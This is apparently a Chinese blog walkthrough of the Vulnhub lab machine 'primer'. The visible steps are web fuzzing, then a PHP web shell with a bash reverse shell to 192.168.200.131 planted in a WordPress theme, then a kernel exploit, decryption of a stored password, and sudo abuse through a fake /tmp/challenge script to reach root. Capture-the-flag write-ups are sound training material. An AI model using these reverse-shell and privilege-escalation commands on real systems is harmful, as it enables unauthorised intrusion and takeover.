首页 > 其他分享 >靶机 primer

靶机 primer

时间:2024-09-10 17:28:06浏览次数:6  
标签:bin enc usr ubuntu home 靶机 primer victor

primer

虚假的打法

dirb

dirb http://192.168.1.115 -X .php .txt

-X指定后缀

参数爆破

Fuzzing/Fuzz_For_Web at master · hacknpentest/Fuzzing · GitHub

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 500 http://website-ip/index.php?FUZZ=somethingtxt

可以man查看一下hc hw hh区别

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136   http://192.168.1.115/index.php\?FUZZ\=something 

截图

scrot -s xxx.png

查看图片

xdg-open xxx.png

wordpress扫描

wpscan

发现主题内的secret.php

写入一句话马

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.200.131/443 0>&1'");
?>

触发方式查看上一级描述

image-20240830204242848

查阅得wp的主题在wordpress/wp-content/themes/

即:wordpress/wp-content/themes/twentynineteen/secret.php

本地nc即可获得反弹shell

sudo -l发现提示

sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /home/saket/enc

enc无法读取

www-data@ubuntu:/home/saket$ ls
ls
enc
password.txt
user.txt

uname发现内核太老

是Linux ubuntu 4.10.0-28-generic

searchsploit Linux ubuntu 4.10.0-28

searchsploit -m 45010.c

wget上传payload,编译运行

gcc 45010.c -o getRoot

提权成功

真正的打法

全局搜索铭感文件,比如backup,也可以用脚本来跑

可以看到一个/opt/backup文件夹

www-data@ubuntu:/opt/backup/server_database$ cat backup_pass
cat backup_pass
your password for backup_database file enc is

"backup_password"


Enjoy!

回到/home/saket运行enc

www-data@ubuntu:/home/saket$ sudo ./enc
sudo ./enc
enter password: backup_password
good
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=

www-data@ubuntu:/home/saket$ cat key.txt
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.

ippsec的md5

366a74cb3c959de17d61db30591c39d1
for cip in $(cat cipher);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4='|openssl enc -d -a -$cip -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null;echo $cip;done
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"

Victor,aes-256-ecb

验证

 /home/kali/Desktop/web/vulnhub/primer  echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4='|openssl enc -d -a -aes-256-ecb -K 3336366137346362336339353964653137643631646233303539316333396431
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"

Victor,#  

ssh连入

sudo -l发现提示,可以无密码root权限执行/home/victor/undefeated_victor中的内容

$ sudo -l
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User saket may run the following commands on ubuntu:
    (root) NOPASSWD: /home/victor/undefeated_victor
$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found

/tmp目录下查看是否有challenge文件,发现没有challenge文件

cd /tmp
echo '#!/bin/bash' >challenge
echo '/bin/bash' >>challenge
chmod +x challenge
sudo /home/victor/undefeated_victor

最后拿下靶机

$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:/tmp# whoami
root

标签:bin,enc,usr,ubuntu,home,靶机,primer,victor
From: https://www.cnblogs.com/ethereal258/p/18406794

相关文章

  • DC-3靶机
    nmap-sV10.204.11.0/24先进行扫描找到靶机开启了80端口查看一下再扫一下目录发现后台登陆页面http://10.204.11.6/administrator/没有账号密码去查一下这个cms的漏洞我们直接sqlmap查出我们所要用的全部信息即可pythonsqlmap.py-u"http://10.204.11.6:80/index......
  • 【C++ Primer Plus习题】12.6
    1大家好,这里是国中之林!❥前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站。有兴趣的可以点点进去看看←问题:解答:main.cpp#include<iostream>#include<cstdlib>#include<ctime>#include"queue.h"using......
  • 【C++ Primer Plus习题】12.5
    大家好,这里是国中之林!❥前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站。有兴趣的可以点点进去看看←问题:解答:main.cpp#include<iostream>#include<cstdlib>#include<ctime>#include"queue.h......
  • 红日靶机(一) 笔记
    红日靶机(一)笔记概述域渗透靶机,可以练习对域渗透的一些知识,主要还是要熟悉powershell语法,powershell往往比cmd的命令行更加强大,而很多渗透开源的脚本都是powershell的。例如NiShang,PowerView等等。这是域渗透的初学靶机。其中也遇到了一些问题靶机地址:http://vulnsta......
  • 【C++ Primer Plus习题】12.1
    大家好,这里是国中之林!❥前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站。有兴趣的可以点点进去看看←问题:解答:main.cpp#include<iostream>#include"Cow.h"usingnamespacestd;intmain(){ Cowc1; ......
  • Tomato靶机通关攻略
    步骤一:进行端口扫描,找寻靶机地址步骤二:访问靶机地址步骤三:利用dirb进行扫描得出:/antibot_image/进行访问步骤四:进入antibots->info.php->右击进入页面源代码->发现存在文件包含漏洞步骤五:页面通过image传参查看passwd文件步骤六:页面通过image传参查看日志文件......
  • hackme靶机通关攻略
    1.登陆靶场网站首页2.注册登录3.单机search,有很多书4.搜索一本书抓包发放到重放器5.数据改为1*,复制数据包到1.txt,发到kali里面6.sqlmap查看当前数据库sqlmap-r'/home/kali/Desktop/1.txt' --current-db--batch7.查看表名sqlmap-r'/home/kali/Desktop/1.t......
  • HTB-Runner靶机笔记
    HTB-Runner靶机笔记概述Runner是HTB上一个中等难度的Linux靶机,它包含以下teamcity漏洞(CVE-2023-42793)该漏洞允许用户绕过身份验证并提取API令牌。以及docker容器逃逸CVE-2024-21626,进行提权操作Runner靶机地址:https://app.hackthebox.com/machines/Runner一、nmap扫描1)端......
  • dc-2靶机
    一:使用nmap工具进行端口扫描我们靶机地址为192.168.78.147,最直接的方法就是用端口扫描工具,查看次ip开放的端口,Nmap-A-p0-65535192.168.78.147二:访问80端口web页面发现无法访问:我们仔细想想,我们输入的是IP地址,但是他页面显示dc-2域名,发现可能用到的技术有dns,那我们尝试dn......
  • DC-1靶机通关教学(DC靶场系列)
    靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/下载完靶机之后需要在虚拟机运行,并且要和kali连接同一网段一、(信息收集)主机发现arp-scan-l-Ieth2通过扫描发现靶机ip地址是192.168.42.133二、(信息收集)端口扫描nmap-A-p-192.168.42.133发现目标靶机开......